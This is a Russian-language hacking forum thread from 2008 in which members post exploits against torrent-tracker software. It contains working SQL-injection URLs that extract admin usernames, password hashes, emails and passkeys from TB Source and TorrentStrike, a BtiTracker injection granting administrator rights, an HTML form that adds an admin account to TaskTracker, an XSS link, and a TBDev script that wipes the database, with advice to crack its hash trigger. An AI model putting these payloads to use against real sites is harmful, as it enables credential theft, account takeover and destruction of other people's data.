Уязвимости движков трэкеров

Discussion in 'Веб-уязвимости' started by z01b, 11 May 2008.

  1. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    Здесь выкладываем уязвимости трэкер-движков.

    Я пожалую начну. Уязвимости готовил уже давно на milw0rm-e выкладывать но руки так и не дошли.

    TB Source <= 0.6

    Code:
    #######################################
    # TB Source <= 0.6 reqdetails.php SQL-Injection
    # Discovered: z01b 
    # Contact:    [censored]
    # Thanx:      melco
    #######################################
    --------------------------------------------------
    # Details  :
    # Website : http://sourceforge.net/projects/tbsource/
    # Vulnerable File : reqdetails.php
    --------------------------------------------------
    
    
    Vulnerability:
    
    SQL-injection to obtain admin user and hash
    
    http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users
    
    #29.12.06 
    

    TorrentStrike <= 0.4


    Code:
    #######################################
    # Torrent Strike <= 0.4 reqdetails.php SQL-Injection
    # Discovered: z01b 
    # Contact:    [censored]
    # Thanx:      melco
    #######################################
    --------------------------------------------------
    # Details  :
    # Website : http://sourceforge.net/projects/torrentstrike/
    # Vulnerable File : reqdetails.php
    --------------------------------------------------
    
    SQL querry, for recieving admin user and hash(md5):
    
    http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users
    
    #29.12.06
    
     
    #1 z01b, 11 May 2008
    Last edited: 11 May 2008
    4 people like this.
  2. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    BtiTracker <=v1.4.1

    Code:
    #################################################################################
    #										
    #	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
    #									
    # Discovered by: m@ge|ozz - [email protected]					
    # Vulnerabitity: Remote Sql Injection /	                                        
    # Problem: Any user can be Administrator					
    # Website Vendor: http://www.btiteam.org					
    # 										
    # Vulnerable Code (account_change.php):						
    #										
    # if (isset($_GET["style"]))       						
    # @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
    # 										
    # if (isset($_GET["langue"])) 							
    # @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
    #										
    # PoC: account_change.php?style=2[SQL]&returnto=%2F				
    #      										
    # Example to gain admin control: account_change.php?style=1,id_level=8								
    #										
    # 										
    # GoogleDork: "by Btiteam"							
    #										
    # Shoutz: - eVolVe or Die - 							
    #										
    #################################################################################
    
    # milw0rm.com [2007-05-22]
    
    TaskTracker all versions

    Code:
    <!--
    
    *******************************************************************************
    # Title   :  TaskTracker All Version Remote Add Admin Exploit
    # Author  :  ajann
    # Contact :  :(
    # S.Page  :  http://www.geckovich.com
    # $$      :  $39.99 - $19.99
    
    *******************************************************************************
    
    -->
    
    <FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
    	<td valign=top class='data3'>
           	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
    	</td>
    	<td valign=top class='data3'>
    		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
    	</td>
    	<td valign=top class='data3'>
    		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
    
    	</td>
    	<td valign=top class='data3'>
    		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
    	</td>
    	<td valign=top class='data3'>
    		<select name="GroupID" class="selectedtextboxes">
    			<option value="1">Publisher</option>
    			<option value="2">Editor</option>
    
    			<option value="3">Administrator</option>
    		</select>
    	</td>
    	<td valign=middle class='data3' align="center" colspan="2" align="center">
        	<input type="submit" value="Gonder">
        	</form>
    
    # milw0rm.com [2007-01-01]
    
     
    3 people like this.
  3. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    TB Source
    Code:
    http://site/sendmessage.php?receiver=1&returnto=><script>alert('a')</script>
     
    1 person likes this.
  4. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    TBDev
    Code:
    <?
    
    require_once("include/bittorrent.php");
    dbconn();
    
    if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") {
    $drops = array();
    $result = mysql_query("SHOW TABLES FROM ".$mysql_db."");
    while (list($name) = mysql_fetch_array($result))
    $drops[] = "`".$name."`";
    die("DROP TABLE ".implode(", ", $drops));
    echo "Drop tables complete...";
    }
    
    ?>
    
    расхешируеm 0bffd3d87e7267c7fe686e20acbee7ab и узнает соответствующую ему строку [string]
    может путем запроса
    http://tracker_url/drop.php?sd=[string]
    удалить всю информацию из базы установленного трекера

    Deflector
     
  5. PandoraBox

    PandoraBox Elder - Старейшина

    Joined:
    6 May 2007
    Messages:
    262
    Likes Received:
    176
    Reputations:
    7
    Там двойной Md5, и уже пофиксено так что безпонтово
     
    #5 PandoraBox, 16 May 2008
    Last edited: 16 May 2008
  6. xgt.exe

    xgt.exe New Member

    Joined:
    24 Nov 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А это разве не двойной???